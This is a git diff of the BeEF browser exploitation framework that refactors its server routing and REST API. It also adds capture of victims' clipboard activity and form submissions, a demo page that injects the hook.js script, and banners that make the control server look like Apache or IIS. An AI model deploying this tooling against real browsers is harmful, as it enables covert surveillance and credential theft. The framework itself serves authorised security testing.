# store the returned browser details
browserdetails = BeEF::Extension::Initialization::Models::BrowserDetails.new(
browserdetails = BeEF::Core::Models::BrowserDetails.new(
:session_id => session_id,
:detail_key => detail_key,
:detail_value => detail_value)
@@ -120,4 +110,3 @@ module Models
end
end
end
end

1
core/main/network_stack/assethandler.rb
View File

@@ -56,6 +56,7 @@ module Handlers
@allocations.delete(url)
@http_server.unmount(url)
@http_server.remap
print_info "Url [" + url + "] unmounted"
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated

64
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -19,7 +19,7 @@ module NetworkStack
module Handlers
# @note DynamicHandler is used reconstruct segmented traffic from the hooked browser
class DynamicReconstruction
class DynamicReconstruction < BeEF::Core::Router::Router
# @note holds packet queue
PQ = Array.new()
@@ -27,50 +27,33 @@ module Handlers
# @note obtain dynamic mount points from HttpHookServer
MOUNTS = BeEF::Core::Server.instance.mounts
before do
error 404 unless !params.empty?
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Combines packet information and pushes to PQ (packet queue), then checks packets
def call(env)
@request = Rack::Request.new(env)
# skip packet checking if the request method is HEAD, PUT, DELETE or if parameters == null
if not self.is_valid_req(@request)
response = Rack::Response.new(
body = [],
status = 404,
header = {
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
}
)
return response
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
get '/' do
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST, GET'
}
)
PQ << {
:beefhook => @request['bh'],
:stream_id => Integer(@request['sid']),
:packet_id => Integer(@request['pid']),
:packet_count => Integer(@request['pc']),
:data => @request['d']
:beefhook => params[:bh],
:stream_id => Integer(params[:sid]),
:packet_id => Integer(params[:pid]),
:packet_count => Integer(params[:pc]),
:data => params[:d]
}
# @todo Test under high load, possibly limit the amount of threads being created
Thread.new {
check_packets()
}
response
end
# Check packets goes through the PQ array and attempts to reconstruct the stream from multiple packets
@@ -99,8 +82,8 @@ module Handlers
begin
res = JSON.parse(b64).first
res['beefhook'] = packet[:beefhook]
res['request'] = @request
res['beefsession'] = @request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
res['request'] = request
res['beefsession'] = request[BeEF::Core::Configuration.instance.get('beef.http.hook_session_name')]
execute(res)
rescue JSON::ParserError => e
print_debug 'Network stack could not decode packet stream.'
@@ -132,17 +115,6 @@ module Handlers
end
end
end
# 1. check methods HEAD, PUT, DELETE. return 404 if these methods are called
# 2. check for parameters = null (no parameters). return 404 in this case
# @param [Hash] request the Rack HTTP Request.
def is_valid_req(request)
is_valid = true
if request.put? or request.delete? or request.head? or request.params.empty?
is_valid = false
end
is_valid
end
# Assist function for getting parameter from hash
# @param [Hash] query Hash to pull key from
@@ -152,9 +124,7 @@ module Handlers
return nil if query[key].nil?
query[key]
end
end
end
end
end

20
core/main/rest/api.rb
View File

@@ -35,9 +35,29 @@ module BeEF
end
end
module RegisterAdminHandler
def self.mount_handler(server)
server.mount('/api/admin', BeEF::Core::Rest::Admin.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet
# This is from extensions/admin_ui/controllers/authentication/authentication.rb
#
def self.permitted_source?(ip)
# get permitted subnet
permitted_ui_subnet = BeEF::Core::Configuration.instance.get("beef.restrictions.permitted_ui_subnet")
target_network = IPAddr.new(permitted_ui_subnet)
# test if ip within subnet
return target_network.include?(ip)
end
end
end

75
core/main/rest/handlers/admin.rb Normal file
View File

@@ -0,0 +1,75 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Admin < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
# error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Authenticate using the config set username/password to retrieve the "token" used for subsquent calls.
# Return the secret token used for subsquene tAPI calls.
#
# Input must be specified in JSON format
#
# +++ Example: +++
#POST /api/admin/login HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"username":"beef", "password":"beef"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","token":"122323121"}
#
post '/login' do
request.body.rewind
begin
data = JSON.parse request.body.read
# check username and password
if not (data['username'].eql? config.get('beef.credentials.user') and data['password'].eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{request.ip} has failed to authenticate in the application.")
halt 401
else
{ "success" => true,
"token" => "#{config.get('beef.api_token')}"
}.to_json
end
rescue Exception => e
error 400
end
end
private
end
end
end
end

20
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -17,14 +17,13 @@
module BeEF
module Core
module Rest
class HookedBrowsers < Sinatra::Base
class HookedBrowsers < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
@@ -45,6 +44,19 @@ module BeEF
output.to_json
end
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
result = {}
details.each do |property|
result[property.detail_key] = property.detail_value
end
result.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
@@ -56,7 +68,7 @@ module BeEF
end
def get_hb_details(hb)
details = BeEF::Extension::Initialization::Models::BrowserDetails
details = BeEF::Core::Models::BrowserDetails
{
'name' => details.get(hb.session, 'BrowserName'),

5
core/main/rest/handlers/logs.rb
View File

@@ -17,14 +17,13 @@
module BeEF
module Core
module Rest
class Logs < Sinatra::Base
class Logs < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',

6
core/main/rest/handlers/modules.rb
View File

@@ -17,14 +17,13 @@
module BeEF
module Core
module Rest
class Modules < Sinatra::Base
class Modules < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
@@ -42,6 +41,7 @@ module BeEF
next if !BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'class' => config.get("beef.module.#{modk}.class"),
'name' => config.get("beef.module.#{modk}.name"),
'category' => config.get("beef.module.#{modk}.category")
}

243
core/main/router/router.rb
View File

@@ -23,34 +23,235 @@ module BeEF
class Router < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found' end
configure do
set :show_exceptions, false
end
# @note Override default 404 HTTP response
not_found do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
#response body
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" +
"<html><head>" +
"<title>404 Not Found</title>" +
"</head><body>" +
"<h1>Not Found</h1>" +
"<p>The requested URL was not found on this server.</p>" +
"<hr>" +
"<address>Apache/2.2.3 (CentOS)</address>" +
"</body></html>"
when "iis"
#response body
"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">" +
"<HTML><HEAD><TITLE>The page cannot be found</TITLE>" +
"<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<STYLE type=\"text/css\">" +
" BODY { font: 8pt/12pt verdana } " +
" H1 { font: 13pt/15pt verdana }" +
" H2 { font: 8pt/12pt verdana }" +
" A:link { color: red }" +
" A:visited { color: maroon }" +
"</STYLE>" +
"</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>" +
"<h1>The page cannot be found</h1>" +
"The page you are looking for might have been removed, had its name changed, or is temporarily unavailable." +
"<hr>" +
"<p>Please try the following:</p>" +
"<ul>" +
"<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>" +
"<li>If you reached this page by clicking a link, contact" +
" the Web site administrator to alert them that the link is incorrectly formatted." +
"</li>" +
"<li>Click the <a href=\"javascript:history.back(1)\">Back</a> button to try another link.</li>" +
"</ul>" +
"<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>" +
"<hr>" +
"<p>Technical Information (for support personnel)</p>" +
"<ul>" +
"<li>Go to <a href=\"http://go.microsoft.com/fwlink/?linkid=8180\">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>" +
"<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr)," +
"and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
"</ul>" +
"</TD></TR></TABLE></BODY></HTML>"
else
"Not Found."
end
else
"Not Found."
end
end
before do
# @note Override Server HTTP response header
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)"
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
#todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
#todo the 404 response will be something like the following:
#<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
#<html><head>
#<title>404 Not Found</title>
#</head><body>
#<h1>Not Found</h1>
#<p>The requested URL /aaaa was not found on this server.</p>
# <hr>
# <address>Apache/2.2.3 (CentOS)</address>
# </body></html>
when "iis"
headers "Server" => "Microsoft-IIS/7.0"
end
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\">" +
"<head>" +
"<title>Apache HTTP Server Test Page powered by CentOS</title>" +
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />" +
"<style type=\"text/css\">" +
"body {" +
"background-color: #fff; " +
"color: #000;" +
"font-size: 0.9em;" +
"font-family: sans-serif,helvetica;" +
"margin: 0;" +
"padding: 0; " +
"} " +
":link { " +
"color: #0000FF; " +
"} " +
":visited { " +
"color: #0000FF; " +
"} " +
"a:hover { " +
"color: #3399FF; " +
"} " +
"h1 { " +
" text-align: center; " +
" margin: 0; " +
" padding: 0.6em 2em 0.4em; " +
" background-color: #3399FF;" +
" color: #ffffff; " +
" font-weight: normal; " +
" font-size: 1.75em; " +
" border-bottom: 2px solid #000; " +
"} " +
"h1 strong {" +
"font-weight: bold; " +
"} " +
"h2 { " +
" font-size: 1.1em;" +
"font-weight: bold; " +
"} " +
".content { " +
" padding: 1em 5em; " +
"} " +
".content-columns { " +
" /* Setting relative positioning allows for " +
" absolute positioning for sub-classes */ " +
" position: relative; " +
" padding-top: 1em; " +
"} " +
".content-column-left { " +
" /* Value for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-right: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-column-right { " +
" /* Values for IE/Win; will be overwritten for other browsers */" +
" width: 47%; " +
" padding-left: 3%; " +
" float: left; " +
" padding-bottom: 2em; " +
"} " +
".content-columns>.content-column-left, .content-columns>.content-column-right {" +
" /* Non-IE/Win */" +
"} " +
"img { " +
" border: 2px solid #fff; " +
" padding: 2px; " +
" margin: 2px; " +
"} " +
"a:hover img { " +
" border: 2px solid #3399FF; " +
"} " +
"</style> " +
"</head> " +
"<body> " +
"<h1>Apache 2 Test Page<br><font size=\"-1\"><strong>powered by</font> CentOS</strong></h1>" +
"<div class=\"content\">" +"<div class=\"content-middle\">" +
"<p>This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page it means that the Apache HTTP server installed at this site is working properly.</p>" +
"</div>" +
"<hr />" +
"<div class=\"content-columns\">" +
"<div class=\"content-column-left\"> " +
"<h2>If you are a member of the general public:</h2>" +
"<p>The fact that you are seeing this page indicates that the website you just visited is either experiencing problems or is undergoing routine maintenance.</p>" +
"<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name \"webmaster\" and directed to the website's domain should reach the appropriate person.</p> " +
"<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to \"webmaster@example.com\".</p>" +
"</div>" +
"<div class=\"content-column-right\">" +
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
" <div class=\"content\">" +
"<div class=\"content-middle\"><h2>About CentOS:</h2><b>The Community ENTerprise Operating System</b> (CentOS) is an Enterprise-class Linux Distribution derived from sources freely provided to the public by a prominent North American Enterprise Linux vendor. CentOS conforms fully with the upstream vendors redistribution policy and aims to be 100% binary compatible. (CentOS mainly changes packages to remove upstream vendor branding and artwork.) The CentOS Project is the organization that builds CentOS.</p>" +
"<p>For information on CentOS please visit the <a href=\"http://www.centos.org/\">CentOS website</a>.</p>" +
"<p><h2>Note:</h2><p>CentOS is an Operating System and it is used to power this website; however, the webserver is owned by the domain owner and not the CentOS Project. <b>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project.</b>" +
"<p>Unless this server is on the CentOS.org domain, the CentOS Project doesn't have anything to do with the content on this webserver or any e-mails that directed you to this site.</p> " +
"<p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>" +
"<p><a href=\"http://www.internic.net/whois.html\">http://www.internic.net/whois.html</a></p>" +
"</div>" +
"</div>" +
"</body>" +
"</html>"
when "iis"
"<html>" +
"<head>" +
"<meta HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=Windows-1252\">" +
"<title ID=titletext>Under Construction</title>" +
"</head>" +
"<body bgcolor=white>" +
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
"<P ID=Comment2><!--Probable causes:<--><P ID=\"errordesc\"><font style=\"font:9pt/12pt verdana; color:black\">" +
"The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured." +
"<P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator." +
"<hr size=1 color=\"blue\">" +
"<P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see &quot;Enabling and Disabling Dynamic Content&quot; in IIS Help." +
"<h5 ID=head1>To access IIS Help</h5>" +
"<ol>" +
"<li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>." +
"<li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears." +
"<li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>." +
"<li ID=bullet4>Click <b>Internet Information Services</b>.</ol>" +
"</td>" +
"</tr>" +
"</table>" +
"</body>" +
"</html>"
else
""
end
end
end
end
end
end

3
core/main/server.rb
View File

@@ -82,6 +82,9 @@ module BeEF
# Create http handler for the javascript hook file
self.mount("#{@configuration.get("beef.http.hook_file")}", BeEF::Core::Handlers::HookedBrowsers.new)
# Create handler for the initialization checks (Browser Details)
self.mount("/init", BeEF::Core::Handlers::BrowserDetails)
# Dynamically get the list of all the http handlers using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'mount_handler', self)

2
extensions/admin_ui/api/command.rb
View File

@@ -29,7 +29,7 @@ module API
# Get the browser detail from the database.
#
def get_browser_detail(key)
bd = BeEF::Extension::Initialization::Models::BrowserDetails
bd = BeEF::Core::Models::BrowserDetails
(print_error "@session_id is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(@session_id)
bd.get(@session_id, key)
end

6
extensions/admin_ui/api/handler.rb
View File

@@ -44,8 +44,10 @@ module API
beef_server.mount('/ui/media', Rack::File.new(media_dir))
# mount the favicon file
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
# mount the favicon file, if we're not imitating a web server.
if !configuration.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
end
end
end

4
extensions/admin_ui/config.yaml
View File

@@ -17,9 +17,7 @@ beef:
extension:
admin_ui:
name: 'Admin UI'
enable: true
username: "beef"
password: "beef"
enable: true
favicon_file_name: "favicon.ico"
favicon_dir: "/images"
login_fail_delay: 1

2
extensions/admin_ui/controllers/authentication/authentication.rb
View File

@@ -69,7 +69,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
end
# check username and password
if not (username.eql? config.get('beef.extension.admin_ui.username') and password.eql? config.get('beef.extension.admin_ui.password') )
if not (username.eql? config.get('beef.credentials.user') and password.eql? config.get('beef.credentials.passwd') )
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has failed to authenticate in the application.")
return
end

2
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -23,7 +23,7 @@ module Controllers
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({

2
extensions/admin_ui/controllers/panel/index.html
View File

@@ -48,7 +48,7 @@
<%= nonce_tag %>
<div id="header">
<div class="right-menu">
<img src="/favicon.ico" alt="BeEF" title="BeEF" />
<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

6
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -85,9 +85,9 @@ class Panel < BeEF::Extension::AdminUI::HttpController
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_icon = BeEF::Extension::Initialization::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Extension::Initialization::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
return {
'session' => hooked_browser.session,

BIN
extensions/admin_ui/media/images/icons/apache_pb.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.3 KiB

BIN
extensions/admin_ui/media/images/icons/pagerror.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.7 KiB

BIN
extensions/admin_ui/media/images/icons/powered_by_rh.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

77
extensions/admin_ui/media/javascript/ui/panel/HooksTab.js Normal file
View File

@@ -0,0 +1,77 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
HooksTab = function() {
/*
* The panel used to configure the hook.
********************************************/
var hooks_panel = new Ext.FormPanel({
title: 'Hooks',
id: 'hooks-panel',
hideLabels : false,
border: false,
padding: '3px 5px 0 5px',
items:[{
fieldLabel: 'Text',
xtype: 'textarea',
id: 'inputText',
name: 'inputText',
width: '100%',
height: '40%',
allowBlank: true
},{
fieldLabel: 'Result',
xtype: 'textarea',
id: 'resultText',
name: 'resultText',
width: '100%',
height: '40%',
allowBlank: true
}],
buttons: [{
text: 'Add Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
},{
text: 'Delete Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
}]
});
HooksTab.superclass.constructor.call(this, {
region: 'center',
items: [hooks_panel],
autoScroll: true,
border: false
});
};
Ext.extend(HooksTab,Ext.Panel, {});

10
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -41,6 +41,7 @@ MainPanel = function(){
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;
//this.hackvertor_tab = new HackVertorTab;
MainPanel.superclass.constructor.call(this, {
@@ -71,7 +72,14 @@ MainPanel = function(){
items:[
this.grid
/*
]},{
]},{
id:'hooks-view',
layout:'border',
title:'Hooks',
hideMode:'offsets',
items:[
//this.hooks_tab
]},{
id:'hackvertor-view',
layout:'border',
title:'HackVertor',

4
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -151,7 +151,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"
@@ -182,7 +182,7 @@ class Core
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Extension::Initialization::Models::BrowserDetails.os_icon(zombie.session))]
tbl << [zombie.id,zombie.ip,beef_logo_to_os(BeEF::Core::Models::BrowserDetails.os_icon(zombie.session))]
end
puts "\n"

2
extensions/console/lib/shellinterface.rb
View File

@@ -19,7 +19,7 @@ module Console
class ShellInterface
BD = BeEF::Extension::Initialization::Models::BrowserDetails
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config

1
extensions/demos/html/basic.html
View File

@@ -1,3 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>

5
extensions/demos/html/plain.html Normal file
View File

@@ -0,0 +1,5 @@
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

8
extensions/events/handler.rb
View File

@@ -66,10 +66,18 @@ module Events
return event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
when 'focus'
return event['time'].to_s+'s - [Focus] Browser has regained focus.'
when 'copy'
return event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
when 'cut'
return event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
when 'paste'
return event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
when 'blur'
return event['time'].to_s+'s - [Blur] Browser has lost focus.'
when 'keys'
return event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
when 'submit'
return event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
end
print_debug '[EVENTS] Event handler has received an unknown event'
return 'Unknown event'

32
extensions/initialization/extension.rb
View File

@@ -1,32 +0,0 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Initialization
extend BeEF::API::Extension
@short_name = @full_name = 'initialization'
@description = 'retrieves information about the browser (type, version, plugins etc.)'
end
end
end
require 'extensions/initialization/models/browserdetails'
require 'extensions/initialization/handler'
require 'extensions/initialization/api'

4
extensions/xssrays/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 5000
clean_timeout: 3000
cross_domain: true
# set js_console_logs to false when using BeEF in production (also because IE browser doesn't support the console object)
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
js_console_logs: false

39
extensions/xssrays/handler.rb
View File

@@ -17,28 +17,26 @@ module BeEF
module Extension
module Xssrays
class Handler
class Handler < BeEF::Core::Router::Router
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
def call(env)
@request = Rack::Request.new(env)
get '/' do
# verify if the request contains the hook token
# raise an exception if it's null or not found in the DB
beef_hook = @request['hbsess'] || nil
# raise an error if it's null or not found in the DB
beef_hook = params[:hbsess] || nil
(print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
rays_scan_id = @request['raysid'] || nil
rays_scan_id = params[:raysid] || nil
(print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
if @request['action'] == 'ray'
if params[:action] == 'ray'
# we received a ray
parse_rays(rays_scan_id)
else
if @request['action'] == 'finish'
if params[:action] == 'finish'
# we received a notification for finishing the scan
finalize_scan(rays_scan_id)
else
@@ -47,38 +45,31 @@ module BeEF
end
end
response = Rack::Response.new(
body = [],
status = 200,
header = {
'Pragma' => 'no-cache',
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
}
)
response
'Access-Control-Allow-Methods' => 'POST,GET'
end
# parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
def parse_rays(rays_scan_id)
xssrays_scan = XS.first(:id => rays_scan_id)
hooked_browser = HB.first(:session => @request['hbsess'])
hooked_browser = HB.first(:session => params[:hbsess])
if (xssrays_scan != nil)
xssrays_detail = XD.new(
:hooked_browser_id => hooked_browser.id,
:vector_name => @request['n'],
:vector_method => @request['m'],
:vector_poc => @request['p'],
:vector_name => params[:n],
:vector_method => params[:m],
:vector_poc => params[:p],
